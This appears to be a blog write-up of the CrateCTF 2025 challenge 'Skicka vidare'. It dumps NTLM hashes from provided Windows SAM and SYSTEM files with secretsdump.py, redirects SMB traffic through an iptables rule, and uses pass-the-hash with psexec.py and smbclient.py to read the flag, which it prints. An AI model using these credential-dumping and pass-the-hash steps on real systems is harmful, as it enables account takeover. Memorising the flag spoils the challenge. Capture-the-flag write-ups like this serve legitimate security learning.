CrateCTF 2025 Writeup: Skicka vidare

In this challenge, we were given two mysterious files and a server address. The goal was to find a flag hidden on that server. The catch? We didn't have a password, and the server was listening on a weird, non-standard port.

j3rry

j3rry

2 min read
CrateCTF 2025 Writeup: Skicka vidare

The files provided:

sam
sam
64 KB
download-circle
system
system
10 MB
download-circle

Step 1: Analyzing the Artifacts

We started with two files provided by the challenge:

  1. sam: This stands for Security Account Manager. On Windows, this file stores users' passwords (in hash form).
  2. system: This is a Windows registry hive that contains the "boot key" (SYSKEY) needed to decrypt the sam file.

You can't read the sam file without the system file. They work together.

Step 2: Dumping the Hashes

Since we have both files, we can extract the password hashes offline. I used a tool called secretsdump.py from the Impacket suite.

secretsdump.py -sam sam -system system LOCAL

The Result: The tool successfully dumped the database. I saw three users: Administrator, Guest, and one that caught my eye immediately: flagholder.

flagholder:1001:aad3...:8737dfdc9280b43767f37cabe1563d8a:::

We now have the NTLM Hash (8737dfdc9280b43767f37cabe1563d8a) for the user flagholder. We don't need to crack it; we can just use the hash itself to log in (a technique called "Pass-the-Hash").

Step 3: The Networking Problem

The challenge description gave us a hint:

"Port 445 may be blocked... try port 21562 instead. There may need to be some iptables-redirect."

When I tried to use standard tools like psexec.py or smbclient.py, they failed.

  1. If I targeted the default port (445), the connection was refused.
  2. If I tried to specify -port 21562, the tools threw an error because they are hard-coded to only accept port 445 or 139.

The Solution: Traffic Redirection

I had to trick my own computer. I used iptables (a Linux firewall tool) to create a rule. This rule tells my computer: "Whenever I try to send traffic to the target IP on port 445, secretly change the destination to port 21562."

First, I got the target IP:

host challs.crate.nu
# Result: 88.131.81.104

Then, I applied the redirection rule:

sudo iptables -t nat -A OUTPUT -p tcp -d 88.131.81.104 --dport 445 -j DNAT --to-destination 88.131.81.104:21562

Step 4: Accessing the Server

Now that the network traffic was fixed, I tried to get a shell using psexec.py targeting port 445 (which my computer redirected to 21562).

psexec.py -port 445 -hashes :8737dfdc9280b43767f37cabe1563d8a flagholder@challs.crate.nu

The Block: It connected! However, it failed with STATUS_ACCESS_DENIED. This happened because psexec tries to upload a service file to the C$ or ADMIN$ share. The user flagholder is a regular user, not an Administrator, so they don't have permission to run services.

Step 5: Browsing Files (The Win)

Since I couldn't get a command shell, I decided to just browse the files like a shared folder. I switched to smbclient.py.

smbclient.py -port 445 -hashes :8737dfdc9280b43767f37cabe1563d8a flagholder@challs.crate.nu

It worked! I got an SMB> prompt. I listed the shares:

SMB> shares
sysvol
netlogon
absolutely_no_flags_here
IPC$

The share absolutely_no_flags_here was obviously the place to look.

  1. I connected to the share: use absolutely_no_flags_here
  2. I listed the files: ls
  3. I found flag.txt and read it: cat flag.txt

The Flag: cratectf{pass_the_hash_or_give_me_the_cash}

Key Takeaways:

  • SAM + SYSTEM = Hashes: If you find these two files, you own the user accounts.
  • Pass-the-Hash: You don't always need the plaintext password; the hash is often enough.
  • IPTables is powerful: Sometimes tools have limitations (like hard-coded ports). You can use the OS to route traffic around those limitations.

Read more